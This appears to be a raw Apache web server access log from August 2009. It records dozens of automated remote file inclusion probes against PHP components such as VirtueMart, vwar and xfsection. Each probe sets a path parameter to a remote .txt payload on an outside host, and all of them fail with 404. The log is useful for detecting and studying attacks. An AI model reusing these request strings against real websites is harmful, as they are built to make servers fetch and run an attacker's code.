81.176.226.164 - - [02/Aug/2009:04:03:24 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
81.176.226.164 - - [02/Aug/2009:04:03:24 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
81.176.226.164 - - [02/Aug/2009:04:03:25 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
81.176.226.164 - - [02/Aug/2009:04:03:25 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
81.176.226.164 - - [02/Aug/2009:04:03:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
122.201.81.6 - - [02/Aug/2009:04:04:01 -0400] "GET /logs/access_log.Q109062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:01 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:01 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:01 -0400] "GET /logs/access_log.Q109051500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:16 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:16 -0400] "GET /logs/access_log.Q109062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:04:16 -0400] "GET /logs/access_log.Q109051500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:04:24 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:04:24 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:04:24 -0400] "GET /logs/access_log.Q109050800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:05:05 -0400] "GET /logs/access_log.Q109060700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:04:05:15 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:04:05:15 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:04:06:01 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:04:07:34 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.149.194.189 - - [02/Aug/2009:04:07:47 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:07:48 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:07:48 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
122.201.81.6 - - [02/Aug/2009:04:07:55 -0400] "GET /logs/access_log.Q109062400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:07:55 -0400] "GET /logs/access_log.Q109051500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:07:58 -0400] "GET /logs/access_log.Q109062400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:08:04 -0400] "GET /logs/access_log.Q109051500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:08:06 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:08:06 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:08:06 -0400] "GET /logs/access_log.Q109053100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.30.81.182 - - [02/Aug/2009:04:08:09 -0400] "GET /logs/error_log.Q109072800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.179.121 - - [02/Aug/2009:04:08:22 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:08:22 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:08:22 -0400] "GET /logs/access_log.Q109053100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:08:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:08:23 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:08:23 -0400] "GET /logs/access_log.Q109050800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:08:29 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:08:30 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:08:30 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:08:45 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:08:50 -0400] "GET /logs/access_log.Q109060700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:09:21 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:09:21 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:09:22 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
206.123.107.13 - - [02/Aug/2009:04:09:29 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
206.123.107.13 - - [02/Aug/2009:04:09:29 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
206.123.107.13 - - [02/Aug/2009:04:09:30 -0400] "GET /logs/access_log.Q109053100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:09:38 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:09:41 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:04:10:00 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
89.149.194.189 - - [02/Aug/2009:04:10:26 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:10:26 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:10:26 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
221.161.196.26 - - [02/Aug/2009:04:10:50 -0400] "GET /logs/access_log.Q109050800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.149.194.189 - - [02/Aug/2009:04:11:16 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
221.161.196.26 - - [02/Aug/2009:04:11:31 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
187.10.144.195 - - [02/Aug/2009:04:11:40 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.137.78.13/.sys/v6id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.820"
213.171.225.234 - - [02/Aug/2009:04:11:41 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
187.10.144.195 - - [02/Aug/2009:04:11:43 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.137.78.13/.sys/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820"
222.162.115.67 - - [02/Aug/2009:04:12:31 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:31 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:31 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:31 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:31 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:31 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:35 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:35 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:35 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:38 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:38 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:38 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:43 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:43 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:43 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:44 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:48 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:51 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:52 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:52 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:52 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:54 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:54 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:54 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:56 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:56 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:56 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:57 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:57 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:57 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:12:57 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
206.123.107.13 - - [02/Aug/2009:04:12:58 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:13:04 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:13:04 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:13:11 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:13:14 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:04:13:20 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.149.194.189 - - [02/Aug/2009:04:13:27 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
221.161.196.26 - - [02/Aug/2009:04:14:26 -0400] "GET /logs/access_log.Q109050800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:04:14:53 -0400] "GET /images/items/EcOm/conform_full.jpg HTTP/1.0" 200 6929 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
221.161.196.26 - - [02/Aug/2009:04:15:10 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
220.181.7.124 - - [02/Aug/2009:04:17:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
89.149.194.189 - - [02/Aug/2009:04:17:14 -0400] "GET /logs/access_log.Q109071200//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:17:14 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:17:14 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
221.161.196.26 - - [02/Aug/2009:04:17:20 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:17:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.14.113.10 - - [02/Aug/2009:04:18:38 -0400] "GET //modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:38 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:39 -0400] "GET //modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:40 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.125.66.128 - - [02/Aug/2009:04:18:41 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.14.113.10 - - [02/Aug/2009:04:18:44 -0400] "GET /logs/error_log.Q109060700%20%20//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:44 -0400] "GET //modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:44 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:47 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
